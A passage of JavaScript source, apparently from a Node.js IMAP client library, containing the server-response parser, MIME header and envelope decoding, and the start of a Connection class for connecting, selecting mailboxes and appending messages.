            if (RE_PRECEDING.test(this._buffer)) {
                var firstChar = this._buffer[0];
                if (firstChar === '*')
                    this._resUntagged();
                else if (firstChar === 'A')
                    this._resTagged();
                else if (firstChar === '+')
                    this._resContinue();

                if (this._literallen > 0 && i < datalen) {
                    this._ignoreReadable = true;
                    
                    this._stream.unshift(data.slice(i));
                    this._ignoreReadable = false;
                    i = datalen;
                    if (!this._body) {
                        
                        this._tryread(this._literallen);
                    }
                }
            } else {
                this.emit('other', this._buffer);
                this._buffer = '';
            }
        }
    }

    if (this._literallen === 0 || this._body)
        this._tryread();
};

IMAPParser.prototype._resTagged = function () {
    var m;
    if (m = RE_LITERAL.exec(this._buffer)) {
        
        this._buffer = this._buffer.replace(RE_LITERAL, LITPLACEHOLDER);
        this._literallen = parseInt(m[1], 10);
    } else if (m = RE_TAGGED.exec(this._buffer)) {
        this._buffer = '';
        this._literals = [];

        this.emit('tagged', {
            type: m[2].toLowerCase(),
            tagnum: parseInt(m[1], 10),
            textCode: (m[3] ? parseTextCode(m[3], this._literals) : m[3]),
            text: m[4]
        });
    } else
        this._buffer = '';
};

IMAPParser.prototype._resUntagged = function () {
    var m;
    if (m = RE_BODYLITERAL.exec(this._buffer)) {
        
        var which = m[1], size = parseInt(m[2], 10);
        this._literallen = size;
        this._body = new ReadableStream();
        this._body._readableState.sync = false;
        this._body._read = EMPTY_READCB;
        m = RE_SEQNO.exec(this._buffer);
        this._buffer = this._buffer.replace(RE_BODYLITERAL, '');
        this.emit('body', this._body, {
            seqno: parseInt(m[1], 10),
            which: which,
            size: size
        });
    } else if (m = RE_LITERAL.exec(this._buffer)) {
        
        this._buffer = this._buffer.replace(RE_LITERAL, LITPLACEHOLDER);
        this._literallen = parseInt(m[1], 10);
    } else if (m = RE_UNTAGGED.exec(this._buffer)) {
        this._buffer = '';
        

        
        
        
        

        var type, num, textCode, val;
        if (m[2] !== undefined)
            num = parseInt(m[2], 10);
        if (m[4] !== undefined)
            textCode = parseTextCode(m[4], this._literals);

        type = (m[1] || m[3]).toLowerCase();

        if (type === 'flags'
            || type === 'search'
            || type === 'capability'
            || type === 'sort') {
            if (m[5]) {
                if (type === 'search' && RE_SEARCH_MODSEQ.test(m[5])) {
                    
                    var p = RE_SEARCH_MODSEQ.exec(m[5]);
                    val = {
                        results: p[1].split(' '),
                        modseq: p[2]
                    };
                } else {
                    if (m[5][0] === '(')
                        val = RE_LISTCONTENT.exec(m[5])[1].split(' ');
                    else
                        val = m[5].split(' ');

                    if (type === 'search' || type === 'sort')
                        val = val.map(function (v) { return parseInt(v, 10); });
                }
            } else
                val = [];
        } else if (type === 'thread') {
            if (m[5])
                val = parseExpr(m[5], this._literals);
            else
                val = [];
        } else if (type === 'list' || type === 'lsub')
            val = parseBoxList(m[5], this._literals);
        else if (type === 'id')
            val = parseId(m[5], this._literals);
        else if (type === 'status')
            val = parseStatus(m[5], this._literals);
        else if (type === 'fetch')
            val = parseFetch.call(this, m[5], this._literals, num);
        else if (type === 'namespace')
            val = parseNamespaces(m[5], this._literals);
        else if (type === 'esearch')
            val = parseESearch(m[5], this._literals);
        else if (type === 'quota')
            val = parseQuota(m[5], this._literals);
        else if (type === 'quotaroot')
            val = parseQuotaRoot(m[5], this._literals);
        else
            val = m[5];

        this._literals = [];

        this.emit('untagged', {
            type: type,
            num: num,
            textCode: textCode,
            text: val
        });
    } else
        this._buffer = '';
};

IMAPParser.prototype._resContinue = function () {
    var m = RE_CONTINUE.exec(this._buffer),
        textCode,
        text;

    this._buffer = '';

    if (!m)
        return;

    text = m[2];

    if (m[1] !== undefined)
        textCode = parseTextCode(m[1], this._literals);

    this.emit('continue', {
        textCode: textCode,
        text: text
    });
};

function indexOfCh(buffer, len, i, ch) {
    var r = -1;
    for (; i < len; ++i) {
        if (buffer[i] === ch) {
            r = i;
            break;
        }
    }
    return r;
}

function parseTextCode(text, literals) {
    var r = parseExpr(text, literals);
    if (r.length === 1)
        return r[0];
    else
        return { key: r[0], val: r.length === 2 ? r[1] : r.slice(1) };
}

function parseESearch(text, literals) {
    var r = parseExpr(text.toUpperCase().replace('UID', ''), literals),
        attrs = {};

    
    
    

    for (var i = 1, len = r.length, key, val; i < len; i += 2) {
        key = r[i].toLowerCase();
        val = r[i + 1];
        if (key === 'all')
            val = val.toString().split(',');
        attrs[key] = val;
    }

    return attrs;
}

function parseId(text, literals) {
    var r = parseExpr(text, literals),
        id = {};
    if (r[0] === null)
        return null;
    for (var i = 0, len = r[0].length; i < len; i += 2)
        id[r[0][i].toLowerCase()] = r[0][i + 1];

    return id;
}

function parseQuota(text, literals) {
    var r = parseExpr(text, literals),
        resources = {};

    for (var i = 0, len = r[1].length; i < len; i += 3) {
        resources[r[1][i].toLowerCase()] = {
            usage: r[1][i + 1],
            limit: r[1][i + 2]
        };
    }

    return {
        root: r[0],
        resources: resources
    };
}

function parseQuotaRoot(text, literals) {
    var r = parseExpr(text, literals);

    return {
        roots: r.slice(1),
        mailbox: r[0]
    };
}

function parseBoxList(text, literals) {
    var r = parseExpr(text, literals);
    return {
        flags: r[0],
        delimiter: r[1],
        name: utf7.decode('' + r[2])
    };
}

function parseNamespaces(text, literals) {
    var r = parseExpr(text, literals), i, len, j, len2, ns, nsobj, namespaces, n;

    for (n = 0; n < 3; ++n) {
        if (r[n]) {
            namespaces = [];
            for (i = 0, len = r[n].length; i < len; ++i) {
                ns = r[n][i];
                nsobj = {
                    prefix: ns[0],
                    delimiter: ns[1],
                    extensions: undefined
                };
                if (ns.length > 2)
                    nsobj.extensions = {};
                for (j = 2, len2 = ns.length; j < len2; j += 2)
                    nsobj.extensions[ns[j]] = ns[j + 1];
                namespaces.push(nsobj);
            }
            r[n] = namespaces;
        }
    }

    return {
        personal: r[0],
        other: r[1],
        shared: r[2]
    };
}

function parseStatus(text, literals) {
    var r = parseExpr(text, literals), attrs = {};
    
    for (var i = 0, len = r[1].length; i < len; i += 2)
        attrs[r[1][i].toLowerCase()] = r[1][i + 1];
    return {
        name: utf7.decode('' + r[0]),
        attrs: attrs
    };
}

function parseFetch(text, literals, seqno) {
    var list = parseExpr(text, literals)[0], attrs = {}, m, body;
    
    for (var i = 0, len = list.length, key, val; i < len; i += 2) {
        key = list[i].toLowerCase();
        val = list[i + 1];
        if (key === 'envelope')
            val = parseFetchEnvelope(val);
        else if (key === 'internaldate')
            val = new Date(val);
        else if (key === 'modseq') 
            val = '' + val[0];
        else if (key === 'body' || key === 'bodystructure')
            val = parseBodyStructure(val);
        else if (m = RE_BODYINLINEKEY.exec(list[i])) {
            
            val = new Buffer('' + val);
            body = new ReadableStream();
            body._readableState.sync = false;
            body._read = EMPTY_READCB;
            this.emit('body', body, {
                seqno: seqno,
                which: m[1],
                size: val.length
            });
            body.push(val);
            body.push(null);
            continue;
        }
        attrs[key] = val;
    }
    return attrs;
}

function parseBodyStructure(cur, literals, prefix, partID) {
    var ret = [], i, len;
    if (prefix === undefined) {
        var result = (Array.isArray(cur) ? cur : parseExpr(cur, literals));
        if (result.length)
            ret = parseBodyStructure(result, literals, '', 1);
    } else {
        var part, partLen = cur.length, next;
        if (Array.isArray(cur[0])) { 
            next = -1;
            while (Array.isArray(cur[++next])) {
                ret.push(parseBodyStructure(cur[next],
                                            literals,
                                            prefix + (prefix !== '' ? '.' : '')
                                                   + (partID++).toString(), 1));
            }
            part = { type: cur[next++].toLowerCase() };
            if (partLen > next) {
                if (Array.isArray(cur[next])) {
                    part.params = {};
                    for (i = 0, len = cur[next].length; i < len; i += 2)
                        part.params[cur[next][i].toLowerCase()] = cur[next][i + 1];
                } else
                    part.params = cur[next];
                ++next;
            }
        } else { 
            next = 7;
            if (typeof cur[1] === 'string') {
                part = {
                    
                    
                    partID: (prefix !== '' ? prefix : '1'),

                    
                    type: cur[0].toLowerCase(), subtype: cur[1].toLowerCase(),
                    params: null, id: cur[3], description: cur[4], encoding: cur[5],
                    size: cur[6]
                };
            } else {
                
                part = { type: cur[0] ? cur[0].toLowerCase() : null, params: null };
                cur.splice(1, 0, null);
                ++partLen;
                next = 2;
            }
            if (Array.isArray(cur[2])) {
                part.params = {};
                for (i = 0, len = cur[2].length; i < len; i += 2)
                    part.params[cur[2][i].toLowerCase()] = cur[2][i + 1];
                if (cur[1] === null)
                    ++next;
            }
            if (part.type === 'message' && part.subtype === 'rfc822') {
                
                if (partLen > next && Array.isArray(cur[next]))
                    part.envelope = parseFetchEnvelope(cur[next]);
                else
                    part.envelope = null;
                ++next;

                
                if (partLen > next && Array.isArray(cur[next]))
                    part.body = parseBodyStructure(cur[next], literals, prefix, 1);
                else
                    part.body = null;
                ++next;
            }
            if ((part.type === 'text'
                 || (part.type === 'message' && part.subtype === 'rfc822'))
                && partLen > next)
                part.lines = cur[next++];
            if (typeof cur[1] === 'string' && partLen > next)
                part.md5 = cur[next++];
        }
        
        parseStructExtra(part, partLen, cur, next);
        ret.unshift(part);
    }
    return ret;
}

function parseStructExtra(part, partLen, cur, next) {
    if (partLen > next) {
        
        
        
        
        
        var disposition = { type: null, params: null };
        if (Array.isArray(cur[next])) {
            disposition.type = cur[next][0];
            if (Array.isArray(cur[next][1])) {
                disposition.params = {};
                for (var i = 0, len = cur[next][1].length, key; i < len; i += 2) {
                    key = cur[next][1][i].toLowerCase();
                    disposition.params[key] = cur[next][1][i + 1];
                }
            }
        } else if (cur[next] !== null)
            disposition.type = cur[next];

        if (disposition.type === null)
            part.disposition = null;
        else
            part.disposition = disposition;

        ++next;
    }
    if (partLen > next) {
        
        
        if (cur[next] !== null)
            part.language = (Array.isArray(cur[next]) ? cur[next] : [cur[next]]);
        else
            part.language = null;
        ++next;
    }
    if (partLen > next)
        part.location = cur[next++];
    if (partLen > next) {
        
        
        
        part.extensions = cur[next];
    }
}

function parseFetchEnvelope(list) {
    return {
        date: new Date(list[0]),
        subject: decodeWords(list[1]),
        from: parseEnvelopeAddresses(list[2]),
        sender: parseEnvelopeAddresses(list[3]),
        replyTo: parseEnvelopeAddresses(list[4]),
        to: parseEnvelopeAddresses(list[5]),
        cc: parseEnvelopeAddresses(list[6]),
        bcc: parseEnvelopeAddresses(list[7]),
        inReplyTo: list[8],
        messageId: list[9]
    };
}

function parseEnvelopeAddresses(list) {
    var addresses = null;
    if (Array.isArray(list)) {
        addresses = [];
        var inGroup = false, curGroup;
        for (var i = 0, len = list.length, addr; i < len; ++i) {
            addr = list[i];
            if (addr[2] === null) { 
                inGroup = false;
                if (curGroup) {
                    addresses.push(curGroup);
                    curGroup = undefined;
                }
            } else if (addr[3] === null) { 
                inGroup = true;
                curGroup = {
                    group: addr[2],
                    addresses: []
                };
            } else { 
                var info = {
                    name: decodeWords(addr[0]),
                    mailbox: addr[2],
                    host: addr[3]
                };
                if (inGroup)
                    curGroup.addresses.push(info);
                else if (!inGroup)
                    addresses.push(info);
            }
            list[i] = addr;
        }
        if (inGroup) {
            
            addresses.push(curGroup);
        }
    }
    return addresses;
}

function parseExpr(o, literals, result, start, useBrackets) {
    start = start || 0;
    var inQuote = false,
        lastPos = start - 1,
        isTop = false,
        isBody = false,
        escaping = false,
        val;

    if (useBrackets === undefined)
        useBrackets = true;
    if (!result)
        result = [];
    if (typeof o === 'string') {
        o = { str: o };
        isTop = true;
    }
    for (var i = start, len = o.str.length; i < len; ++i) {
        if (!inQuote) {
            if (isBody) {
                if (o.str[i] === ']') {
                    val = convStr(o.str.substring(lastPos + 1, i + 1), literals);
                    result.push(val);
                    lastPos = i;
                    isBody = false;
                }
            } else if (o.str[i] === '"')
                inQuote = true;
            else if (o.str[i] === ' '
                     || o.str[i] === ')'
                     || (useBrackets && o.str[i] === ']')) {
                if (i - (lastPos + 1) > 0) {
                    val = convStr(o.str.substring(lastPos + 1, i), literals);
                    result.push(val);
                }
                if ((o.str[i] === ')' || (useBrackets && o.str[i] === ']')) && !isTop)
                    return i;
                lastPos = i;
            } else if ((o.str[i] === '(' || (useBrackets && o.str[i] === '['))) {
                if (o.str[i] === '['
                    && i - 4 >= start
                    && o.str.substring(i - 4, i).toUpperCase() === 'BODY') {
                    isBody = true;
                    lastPos = i - 5;
                } else {
                    var innerResult = [];
                    i = parseExpr(o, literals, innerResult, i + 1, useBrackets);
                    lastPos = i;
                    result.push(innerResult);
                }
            }
        } else if (o.str[i] === '\\')
            escaping = !escaping;
        else if (o.str[i] === '"') {
            if (!escaping)
                inQuote = false;
            escaping = false;
        }
        if (i + 1 === len && len - (lastPos + 1) > 0)
            result.push(convStr(o.str.substring(lastPos + 1), literals));
    }
    return (isTop ? result : start);
}

function convStr(str, literals) {
    if (str[0] === '"') {
        str = str.substring(1, str.length - 1);
        var newstr = '', isEscaping = false, p = 0;
        for (var i = 0, len = str.length; i < len; ++i) {
            if (str[i] === '\\') {
                if (!isEscaping)
                    isEscaping = true;
                else {
                    isEscaping = false;
                    newstr += str.substring(p, i - 1);
                    p = i;
                }
            } else if (str[i] === '"') {
                if (isEscaping) {
                    isEscaping = false;
                    newstr += str.substring(p, i - 1);
                    p = i;
                }
            }
        }
        if (p === 0)
            return str;
        else {
            newstr += str.substring(p);
            return newstr;
        }
    } else if (str === 'NIL')
        return null;
    else if (RE_INTEGER.test(str)) {
        
        
        var val = parseInt(str, 10);
        return (val.toString() === str ? val : str);
    } else if (literals && literals.length && str === LITPLACEHOLDER) {
        var l = literals.shift();
        if (Buffer.isBuffer(l))
            l = l.toString('utf8');
        return l;
    }

    return str;
}

function repeat(chr, len) {
    var s = '';
    for (var i = 0; i < len; ++i)
        s += chr;
    return s;
}

function decodeBytes(buf, encoding, offset, mlen, pendoffset, state, nextBuf) {
    if (jsencoding.encodingExists(encoding)) {
        if (state.buffer !== undefined) {
            if (state.encoding === encoding && state.consecutive) {
                
                
                var newbuf = new Buffer(state.buffer.length + buf.length);
                state.buffer.copy(newbuf, 0);
                buf.copy(newbuf, state.buffer.length);
                buf = newbuf;
            } else {
                
                
                
                
                
                state.buffer = state.encoding = undefined;
                state.curReplace = undefined;
            }
        }
        var ret, isPartial = false;
        if (state.remainder !== undefined) {
            
            ret = state.remainder;
            state.remainder = undefined;
        } else {
            try {
                ret = jsencoding.TextDecoder(encoding).decode(buf);
            } catch (e) {
                if (e.message.indexOf('Seeking') === 0)
                    isPartial = true;
            }
        }
        if (!isPartial && nextBuf) {
            
            
            
            var lookahead, lookaheadBuf = new Buffer(buf.length + nextBuf.length);
            buf.copy(lookaheadBuf);
            nextBuf.copy(lookaheadBuf, buf.length);
            try {
                lookahead = jsencoding.TextDecoder(encoding).decode(lookaheadBuf);
            } catch (e) {
                
            }
            if (lookahead !== undefined) {
                if (lookahead.indexOf(ret) === 0) {
                    
                    state.remainder = lookahead.substring(ret.length);
                } else {
                    isPartial = true;
                    ret = undefined;
                }
            }
        }
        if (ret !== undefined) {
            if (state.curReplace) {
                
                
                
                state.replaces.push({
                    fromOffset: state.curReplace[0].fromOffset,
                    toOffset: offset + mlen,
                    val: ret
                });
                state.replaces.splice(state.replaces.indexOf(state.curReplace), 1);
                state.curReplace = undefined;
            } else {
                
                
                state.replaces.push({
                    
                    fromOffset: state.consecutive ? pendoffset : offset,
                    toOffset: offset + mlen,
                    val: ret
                });
            }
            state.buffer = state.encoding = undefined;
            return;
        } else if (isPartial) {
            
            
            
            
            
            state.encoding = encoding;
            state.buffer = buf;
            if (!state.curReplace)
                state.replaces.push(state.curReplace = []);
            state.curReplace.push({
                fromOffset: offset,
                toOffset: offset + mlen,
                
                
                val: repeat('\uFFFD', buf.length)
            });
            return;
        }
    }
    
    
    state.replaces.push({
        fromOffset: offset,
        toOffset: offset + mlen,
        val: buf.toString('binary')
    });
}

function qEncReplacer(match, byte) {
    if (match === '_')
        return ' ';
    else
        return String.fromCharCode(parseInt(byte, 16));
}
function decodeWords(str, state) {
    var pendoffset = -1;

    if (!state) {
        state = {
            buffer: undefined,
            encoding: undefined,
            consecutive: false,
            replaces: undefined,
            curReplace: undefined,
            remainder: undefined
        };
    }

    state.replaces = [];

    var bytes, m, next, i, j, leni, lenj, seq, replaces = [], lastReplace = {};

    
    while (m = RE_ENCWORD.exec(str)) {
        seq = {
            consecutive: (pendoffset > -1
                          ? RE_LWS_ONLY.test(str.substring(pendoffset, m.index))
                          : false),
            charset: m[1].toLowerCase(),
            encoding: m[2].toLowerCase(),
            chunk: m[3],
            index: m.index,
            length: m[0].length,
            pendoffset: pendoffset,
            buf: undefined
        };
        lastReplace = replaces.length && replaces[replaces.length - 1];
        if (seq.consecutive
            && seq.charset === lastReplace.charset
            && seq.encoding === lastReplace.encoding
            && seq.encoding === 'q') {
            lastReplace.length += seq.length + seq.index - pendoffset;
            lastReplace.chunk += seq.chunk;
        } else {
            replaces.push(seq);
            lastReplace = seq;
        }
        pendoffset = m.index + m[0].length;
    }

    
    for (i = 0, leni = replaces.length; i < leni; ++i) {
        m = replaces[i];
        state.consecutive = m.consecutive;
        if (m.encoding === 'q') {
            
            bytes = new Buffer(m.chunk.replace(RE_QENC, qEncReplacer), 'binary');
            next = undefined;
        } else {
            
            bytes = m.buf || new Buffer(m.chunk, 'base64');
            next = replaces[i + 1];
            if (next && next.consecutive && next.encoding === m.encoding
              && next.charset === m.charset) {
                
                
                next.buf = new Buffer(next.chunk, 'base64');
            }
        }
        decodeBytes(bytes, m.charset, m.index, m.length, m.pendoffset, state,
          next && next.buf);
    }

    
    for (i = state.replaces.length - 1; i >= 0; --i) {
        seq = state.replaces[i];
        if (Array.isArray(seq)) {
            for (j = 0, lenj = seq.length; j < lenj; ++j) {
                str = str.substring(0, seq[j].fromOffset)
                      + seq[j].val
                      + str.substring(seq[j].toOffset);
            }
        } else {
            str = str.substring(0, seq.fromOffset)
                  + seq.val
                  + str.substring(seq.toOffset);
        }
    }

    return str;
}

function parseHeader(str, noDecode) {
    var lines = str.split(RE_CRLF),
        len = lines.length,
        header = {},
        state = {
            buffer: undefined,
            encoding: undefined,
            consecutive: false,
            replaces: undefined,
            curReplace: undefined,
            remainder: undefined
        },
        m, h, i, val;

    for (i = 0; i < len; ++i) {
        if (lines[i].length === 0)
            break; 
        if (lines[i][0] === '\t' || lines[i][0] === ' ') {
            if (!Array.isArray(header[h]))
                continue; 
            
            val = lines[i];
            if (!noDecode) {
                if (RE_ENCWORD_END.test(lines[i - 1])
                    && RE_ENCWORD_BEGIN.test(val)) {
                    
                    
                    val = val.substring(1);
                }
            }
            header[h][header[h].length - 1] += val;
        } else {
            m = RE_HDR.exec(lines[i]);
            if (m) {
                h = m[1].toLowerCase().trim();
                if (m[2]) {
                    if (header[h] === undefined)
                        header[h] = [m[2]];
                    else
                        header[h].push(m[2]);
                } else
                    header[h] = [''];
            } else
                break;
        }
    }
    if (!noDecode) {
        var hvs;
        for (h in header) {
            hvs = header[h];
            for (i = 0, len = header[h].length; i < len; ++i)
                hvs[i] = decodeWords(hvs[i], state);
        }
    }

    return header;
}


var Parser = IMAPParser;

var MAX_INT = 9007199254740992,
    KEEPALIVE_INTERVAL = 10000,
    MAX_IDLE_WAIT = 300000, 
    MONTHS = ['Jan', 'Feb', 'Mar',
              'Apr', 'May', 'Jun',
              'Jul', 'Aug', 'Sep',
              'Oct', 'Nov', 'Dec'],
    FETCH_ATTR_MAP = {
        'RFC822.SIZE': 'size',
        'BODY': 'struct',
        'BODYSTRUCTURE': 'struct',
        'ENVELOPE': 'envelope',
        'INTERNALDATE': 'date'
    },
    SPECIAL_USE_ATTRIBUTES = [
      '\\All',
      '\\Archive',
      '\\Drafts',
      '\\Flagged',
      '\\Important',
      '\\Junk',
      '\\Sent',
      '\\Trash'
    ],
    CRLF = '\r\n',
    RE_CMD = /^([^ ]+)(?: |$)/,
    RE_UIDCMD_HASRESULTS = /^UID (?:FETCH|SEARCH|SORT)/,
    RE_IDLENOOPRES = /^(IDLE|NOOP) /,
    RE_OPENBOX = /^EXAMINE|SELECT$/,
    RE_BODYPART = /^BODY\[/,
    RE_INVALID_KW_CHARS = /[\(\)\{\\\"\]\%\*\x00-\x20\x7F]/,
    RE_NUM_RANGE = /^(?:[\d]+|\*):(?:[\d]+|\*)$/,
    RE_BACKSLASH = /\\/g,
    RE_DBLQUOTE = /"/g,
    RE_ESCAPE = /\\\\/g,
    RE_INTEGER = /^\d+$/;

function Connection(config) {
    if (!(this instanceof Connection))
        return new Connection(config);

    EventEmitter.call(this);

    config || (config = {});

    this._config = {
        socket: config.socket,
        socketTimeout: config.socketTimeout || 0,
        host: config.host || 'localhost',
        port: config.port || 143,
        tls: config.tls,
        tlsOptions: config.tlsOptions,
        autotls: config.autotls,
        user: config.user,
        password: config.password,
        xoauth: config.xoauth,
        xoauth2: config.xoauth2,
        connTimeout: config.connTimeout || 10000,
        authTimeout: config.authTimeout || 5000,
        keepalive: (config.keepalive === undefined || config.keepalive === null
                    ? true
                    : config.keepalive)
    };

    this._sock = config.socket || undefined;
    this._tagcount = 0;
    this._tmrConn = undefined;
    this._tmrKeepalive = undefined;
    this._tmrAuth = undefined;
    this._queue = [];
    this._box = undefined;
    this._idle = { started: undefined, enabled: false };
    this._parser = undefined;
    this._curReq = undefined;
    this.delimiter = undefined;
    this.namespaces = undefined;
    this.state = 'disconnected';
    this.debug = config.debug;
}
inherits(Connection, EventEmitter);

Connection.prototype.connect = function () {
    var config = this._config,
        self = this,
        socket,
        parser,
        tlsOptions;

    socket = config.socket || new Socket();
    socket.setKeepAlive(true);
    this._sock = undefined;
    this._tagcount = 0;
    this._tmrConn = undefined;
    this._tmrKeepalive = undefined;
    this._tmrAuth = undefined;
    this._queue = [];
    this._box = undefined;
    this._idle = { started: undefined, enabled: false };
    this._parser = undefined;
    this._curReq = undefined;
    this.delimiter = undefined;
    this.namespaces = undefined;
    this.state = 'disconnected';

    if (config.tls) {
        tlsOptions = {};
        tlsOptions.host = config.host;
        
        for (var k in config.tlsOptions)
            tlsOptions[k] = config.tlsOptions[k];
        tlsOptions.socket = socket;
    }

    if (config.tls)
        this._sock = tls.connect(tlsOptions, onconnect);
    else {
        socket.once('connect', onconnect);
        this._sock = socket;
    }

    function onconnect() {
        clearTimeout(self._tmrConn);
        self.state = 'connected';
        self.debug && self.debug('[connection] Connected to host');
        self._tmrAuth = setTimeout(function () {
            var err = new Error('Timed out while authenticating with server');
            err.source = 'timeout-auth';
            self.emit('error', err);
            socket.destroy();
        }, config.authTimeout);
    }

    this._onError = function (err) {
        clearTimeout(self._tmrConn);
        clearTimeout(self._tmrAuth);
        self.debug && self.debug('[connection] Error: ' + err);
        err.source = 'socket';
        self.emit('error', err);
    };
    this._sock.on('error', this._onError);

    this._onSocketTimeout = function () {
        clearTimeout(self._tmrConn);
        clearTimeout(self._tmrAuth);
        clearTimeout(self._tmrKeepalive);
        self.state = 'disconnected';
        self.debug && self.debug('[connection] Socket timeout');

        var err = new Error('Socket timed out while talking to server');
        err.source = 'socket-timeout';
        self.emit('error', err);
        socket.destroy();
    };
    this._sock.on('timeout', this._onSocketTimeout);
    socket.setTimeout(config.socketTimeout);

    socket.once('close', function (had_err) {
        clearTimeout(self._tmrConn);
        clearTimeout(self._tmrAuth);
        clearTimeout(self._tmrKeepalive);
        self.state = 'disconnected';
        self.debug && self.debug('[connection] Closed');
        self.emit('close', had_err);
    });

    socket.once('end', function () {
        clearTimeout(self._tmrConn);
        clearTimeout(self._tmrAuth);
        clearTimeout(self._tmrKeepalive);
        self.state = 'disconnected';
        self.debug && self.debug('[connection] Ended');
        self.emit('end');
    });

    this._parser = parser = new Parser(this._sock, this.debug);

    parser.on('untagged', function (info) {
        self._resUntagged(info);
    });
    parser.on('tagged', function (info) {
        self._resTagged(info);
    });
    parser.on('body', function (stream, info) {
        var msg = self._curReq.fetchCache[info.seqno], toget;

        if (msg === undefined) {
            msg = self._curReq.fetchCache[info.seqno] = {
                msgEmitter: new EventEmitter(),
                toget: self._curReq.fetching.slice(0),
                attrs: {},
                ended: false
            };

            self._curReq.bodyEmitter.emit('message', msg.msgEmitter, info.seqno);
        }

        toget = msg.toget;

        
        
        
        
        var thisbody = parseExpr(info.which);
        for (var i = 0, len = toget.length; i < len; ++i) {
            if (_deepEqual(thisbody, toget[i])) {
                toget.splice(i, 1);
                msg.msgEmitter.emit('body', stream, info);
                return;
            }
        }
        stream.resume(); 
    });
    parser.on('continue', function (info) {
        var type = self._curReq.type;
        if (type === 'IDLE') {
            if (self._queue.length
                && self._idle.started === 0
                && self._curReq
                && self._curReq.type === 'IDLE'
                && self._sock
                && self._sock.writable
                && !self._idle.enabled) {
                self.debug && self.debug('=> DONE');
                self._sock.write('DONE' + CRLF);
                return;
            }
            
            self._idle.started = Date.now();
        } else if (/^AUTHENTICATE XOAUTH/.test(self._curReq.fullcmd)) {
            self._curReq.oauthError = new Buffer(info.text, 'base64').toString('utf8');
            self.debug && self.debug('=> ' + inspect(CRLF));
            self._sock.write(CRLF);
        } else if (type === 'APPEND') {
            self._sockWriteAppendData(self._curReq.appendData);
        } else if (self._curReq.lines && self._curReq.lines.length) {
            var line = self._curReq.lines.shift() + '\r\n';
            self.debug && self.debug('=> ' + inspect(line));
            self._sock.write(line, 'binary');
        }
    });
    parser.on('other', function (line) {
        var m;
        if (m = RE_IDLENOOPRES.exec(line)) {
            
            self._idle.enabled = false;
            self._idle.started = undefined;
            clearTimeout(self._tmrKeepalive);

            self._curReq = undefined;

            if (self._queue.length === 0
                && self._config.keepalive
                && self.state === 'authenticated'
                && !self._idle.enabled) {
                self._idle.enabled = true;
                if (m[1] === 'NOOP')
                    self._doKeepaliveTimer();
                else
                    self._doKeepaliveTimer(true);
            }

            self._processQueue();
        }
    });

    this._tmrConn = setTimeout(function () {
        var err = new Error('Timed out while connecting to server');
        err.source = 'timeout';
        self.emit('error', err);
        socket.destroy();
    }, config.connTimeout);

    socket.connect(config.port, config.host);
};

Connection.prototype.serverSupports = function (cap) {
    return (this._caps && this._caps.indexOf(cap) > -1);
};

Connection.prototype.destroy = function () {
    this._queue = [];
    this._curReq = undefined;
    this._sock && this._sock.end();
};

Connection.prototype.end = function () {
    var self = this;
    this._enqueue('LOGOUT', function () {
        self._queue = [];
        self._curReq = undefined;
        self._sock.end();
    });
};

Connection.prototype.append = function (data, options, cb) {
    var literal = this.serverSupports('LITERAL+');
    if (typeof options === 'function') {
        cb = options;
        options = undefined;
    }
    options = options || {};
    if (!options.mailbox) {
        if (!this._box)
            throw new Error('No mailbox specified or currently selected');
        else
            options.mailbox = this._box.name;
    }
    var cmd = 'APPEND "' + escape(utf7.encode('' + options.mailbox)) + '"';
    if (options.flags) {
        if (!Array.isArray(options.flags))
            options.flags = [options.flags];
        if (options.flags.length > 0) {
            for (var i = 0, len = options.flags.length; i < len; ++i) {
                if (options.flags[i][0] !== '$' && options.flags[i][0] !== '\\')
                    options.flags[i] = '\\' + options.flags[i];
            }
            cmd += ' (' + options.flags.join(' ') + ')';
        }
    }
    if (options.date) {
        if (!isDate(options.date))
            throw new Error('`date` is not a Date object');
        cmd += ' "';
        cmd += options.date.getDate();
        cmd += '-';
        cmd += MONTHS[options.date.getMonth()];
        cmd += '-';
        cmd += options.date.getFullYear();
        cmd += ' ';
        cmd += ('0' + options.date.getHours()).slice(-2);
        cmd += ':';
        cmd += ('0' + options.date.getMinutes()).slice(-2);
        cmd += ':';
        cmd += ('0' + options.date.getSeconds()).slice(-2);
        cmd += ((options.date.getTimezoneOffset() > 0) ? ' -' : ' +');
        cmd += ('0' + (-options.date.getTimezoneOffset() / 60)).slice(-2);
        cmd += ('0' + (-options.date.getTimezoneOffset() % 60)).slice(-2);
        cmd += '"';
    }
    cmd += ' {';
    cmd += (Buffer.isBuffer(data) ? data.length : Buffer.byteLength(data));
    cmd += (literal ? '+' : '') + '}';

    this._enqueue(cmd, cb);

    if (literal)
        this._queue[this._queue.length - 1].literalAppendData = data;
    else
        this._queue[this._queue.length - 1].appendData = data;
};

Connection.prototype.getBoxes = function (namespace, cb) {
    if (typeof namespace === 'function') {
        cb = namespace;
        namespace = '';
    }

    namespace = escape(utf7.encode('' + namespace));

    this._enqueue('LIST "' + namespace + '" "*"', cb);
};

Connection.prototype.id = function (identification, cb) {
    if (!this.serverSupports('ID'))
        throw new Error('Server does not support ID');
    var cmd = 'ID';
    if ((identification === null) || (Object.keys(identification).length === 0))
        cmd += ' NIL';
    else {
        if (Object.keys(identification).length > 30)
            throw new Error('Max allowed number of keys is 30');
        var kv = [];
        for (var k in identification) {
            if (Buffer.byteLength(k) > 30)
                throw new Error('Max allowed key length is 30');
            if (Buffer.byteLength(identification[k]) > 1024)
                throw new Error('Max allowed value length is 1024');
            kv.push('"' + escape(k) + '"');
            kv.push('"' + escape(identification[k]) + '"');
        }
        cmd += ' (' + kv.join(' ') + ')';
    }
    this._enqueue(cmd, cb);
};

Connection.prototype.openBox = function (name, encoded, readOnly, cb) {
    if (this.state !== 'authenticated')
        throw new Error('Not authenticated');

    if (typeof readOnly === 'function') {
        cb = readOnly;
        readOnly = false;
    }

    var encname = name;

    if (!encoded) {
        name = '' + name;
        encname = escape(utf7.encode(name));
    }

    var cmd = 'SELECT',
        self = this;

    cmd += ' "' + encname + '"';

    if (this.serverSupports('CONDSTORE'))
        cmd += ' (CONDSTORE)';

    this._enqueue(cmd, function (err) {
        if (err) {
            self._box = undefined;
            cb(err);
        } else {
            self._box.name = name;
            cb(err, self._box);
        }
    });
};

Connection.prototype.closeBox = function (shouldExpunge, cb) {
    if (this._box === undefined)
        throw new Error('No mailbox is currently selected');

    var self = this;

    if (typeof shouldExpunge === 'function') {
        cb = shouldExpunge;
        shouldExpunge = true;
    }

    if (shouldExpunge) {
        this._enqueue('CLOSE', function (err) {
            if (!err)
                self._box = undefined;

            cb(err);
        });
    } else {
        if (this.serverSupports('UNSELECT')) {
